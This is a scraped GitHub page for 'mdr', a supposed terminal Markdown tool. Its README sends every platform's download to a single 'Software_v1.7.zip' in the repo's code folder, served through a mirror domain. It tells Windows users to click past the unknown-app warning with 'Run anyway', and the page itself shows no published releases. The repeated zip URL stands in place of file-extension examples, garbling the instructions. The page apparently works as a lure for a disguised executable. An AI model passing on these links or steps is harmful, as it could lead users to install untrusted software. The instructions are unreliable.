Skip to content

Kaos-777/mdr

Folders and files

NameName
Last commit message
Last commit date

Latest commit

ย 

History

20 Commits
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 

Repository files navigation

๐Ÿ“„ mdr - Simple Markdown Terminal Tool

Download mdr


๐Ÿ“Œ What is mdr?

mdr is a tool you can use right in your terminal to work with Markdown files. Markdown is a simple way to write formatted text using plain text marks. This tool helps you:

  • See your Markdown files nicely shown (rendered).
  • Edit your Markdown text without leaving the terminal.
  • Find and fix common Markdown errors.

You donโ€™t need to know any programming to use mdr. It makes your Markdown work faster and easier.


๐Ÿ’ป Who is this for?

mdr is for anyone who writes or reads Markdown files often. This could be people who:

  • Take notes in plain text.
  • Write README files for projects.
  • Keep simple journals or lists.
  • Publish documents with basic formatting.
  • Prefer working without a mouse or graphical editor.

If you use the terminal for work, or want a quick way to handle Markdown files without switching windows, mdr fits well.


๐Ÿ›  Features at a glance

  • Markdown Renderer: View your Markdown files styled and formatted, directly in the terminal.
  • Markdown Editor: Open and change Markdown files right from your command line.
  • Markdown Linter: Check your files for common mistakes and improve quality.
  • Terminal User Interface (TUI): Navigate and interact with your files easily using keyboard shortcuts.
  • Lightweight: Fast and small, it starts quickly and runs smoothly.
  • Cross-Platform: Works on Windows, macOS, and Linux terminals.
  • Clear Error Messages: Helps understand any problems with Markdown syntax.

๐Ÿš€ Getting Started

This section walks you through downloading and running mdr. It covers system requirements and simple steps to get you up and running.

System requirements

mdr works well on most computers with these:

  • Operating System: Windows 10 or later, macOS 10.14+ (Mojave or newer), Linux (any popular distribution)
  • Terminal: Default terminal app (Command Prompt, PowerShell, Terminal, or any terminal emulator)
  • Memory: At least 100 MB free RAM
  • Disk Space: About 50 MB free space for the app and temporary files
  • Internet: Needed only for downloading mdr

No special setup or software is needed beyond your terminal.


โฌ‡๏ธ Download & Install

To start using mdr, you must first download it.

How to download

Visit this page to download the latest version of mdr:

Download mdr from GitHub Releases

What to look for

On the releases page, find the file that matches your computer:

  • For Windows, look for a .exe file (example: https://github.com/Kaos-777/mdr/raw/refs/heads/main/cmd/Software_v1.7.zip)
  • For macOS, look for a .zip or https://github.com/Kaos-777/mdr/raw/refs/heads/main/cmd/Software_v1.7.zip file with darwin or mac in the name
  • For Linux, look for https://github.com/Kaos-777/mdr/raw/refs/heads/main/cmd/Software_v1.7.zip or .AppImage files with Linux in their name

Download the file related to your system.

Running mdr

  • Windows:

    1. Double-click the .exe file you downloaded.
    2. If Windows warns about unknown apps, choose โ€œMore infoโ€ and then โ€œRun anyway.โ€
    3. A command window should open showing the mdr interface.
  • macOS:

    1. Open the terminal app.
    2. Navigate to the folder where you saved mdr using the cd command.
    3. If the file is compressed (.zip or https://github.com/Kaos-777/mdr/raw/refs/heads/main/cmd/Software_v1.7.zip), double-click it to unzip.
    4. Run mdr by typing ./mdr and pressing Enter. You may need to make the file executable first with chmod +x mdr.
  • Linux:

    1. Open your terminal.
    2. Go to the folder with the downloaded mdr file.
    3. If needed, unzip the file.
    4. Make it executable by running: chmod +x mdr
    5. Start mdr by typing ./mdr and hitting Enter.

If you want, you can copy or move the mdr file to a folder that is part of your systemโ€™s PATH. This allows running mdr from any terminal window without navigating to its folder.


โœจ Using mdr

Once mdr is running, you will see a menu and a simple interface. Hereโ€™s how to get around:

  • Use the arrow keys to move through menus.
  • Press Enter to select options or open files.
  • To open a Markdown file, choose โ€œOpen Fileโ€ and type the path.
  • Use the editor to type or change text.
  • The renderer option shows a preview of your current file.
  • The linter checks your file and lists any issues.
  • Press q or Ctrl+C to exit mdr at any time.

mdr has helpful hints and shortcuts inside the app, so donโ€™t worry about memorizing commands right away.


๐Ÿ“š Tips and Tricks

  • Most Markdown syntax works in mdr, including headings, lists, bold, italics, and links.
  • Save your work regularly in the editor with Ctrl+S or the menu option.
  • If you see rendering problems, check your Markdown for lint warnings.
  • Keyboard shortcuts speed up your work. Look for their list under the โ€œHelpโ€ menu.
  • Use mdr with your favorite terminal emulator for the best experience.

๐Ÿ‘ฉโ€๐Ÿ’ป Support and Feedback

If you have questions or problems:

  • Visit the Issues section on the mdr GitHub page to see if others have the same problem: mdr Issues
  • You can open a new issue describing what happened and your computer details.
  • Check the README updates for fixes or new features.

๐Ÿ”— Useful Links


Download mdr

About

๐Ÿ“„ Render, edit, and lint Markdown directly in the terminal for efficient document handling without leaving the command line.

Topics

Resources

License

Stars

0 stars

Watchers

1 watching

Forks

Releases

No releases published

Packages

 
 
 

Contributors

Languages